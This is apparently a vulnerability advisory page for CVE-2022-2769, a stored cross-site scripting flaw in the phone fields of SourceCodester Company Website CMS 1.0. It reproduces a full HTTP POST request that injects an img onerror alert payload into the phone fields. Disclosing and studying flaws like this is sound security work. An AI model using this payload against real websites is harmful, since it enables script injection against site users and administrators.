Headline

CVE-2022-2769: vul/Company Website CMS(XSS).md at main · ch0ing/vul

A vulnerability, which was classified as problematic, has been found in SourceCodester Company Website CMS. This issue affects some unknown processing of the file /dashboard/contact. The manipulation of the argument phone leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206165 was assigned to this vulnerability.

2 years ago

CVE

Open in Source

#sql #xss #vulnerability #web #windows #apache #git #php #auth #firefox

Permalink

Company Website CMS - /dashboard/contact ‘phone’ Stored Cross-Site Scripting(XSS)****Exploit Title: Company Website CMS - /dashboard/contact ‘phone’ Stored Cross-Site Scripting(XSS)****Exploit Author: [email protected] inc****Vendor Homepage: https://www.sourcecodester.com/php/15517/company-website-cms-php.html****Software Link:https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code****Version: Company Website CMS 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application. Company Website CMS does not filter the content correctly at the parameter, resulting in the generation of stored XSS.

Payload used:

POST /dashboard/contact HTTP/1.1
Host: 192.168.67.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7024317128117527412760215857
Content-Length: 989
Origin: http://192.168.67.9
Connection: close
Referer: http://192.168.67.9/dashboard/contact
Upgrade-Insecure-Requests: 1

-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="phone1"

+89 (0) 2354 5470091<img src="" onerror="alert(1)">
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="phone2"

+89 (0) 2354 5470091<img src="" onerror="alert(1)">
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="email1"

[email protected]
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="email2"

[email protected]
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="longitude"

7.099737483
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="latitude"

7.63734634
-----------------------------7024317128117527412760215857
Content-Disposition: form-data; name="save"


-----------------------------7024317128117527412760215857--

Proof of Concept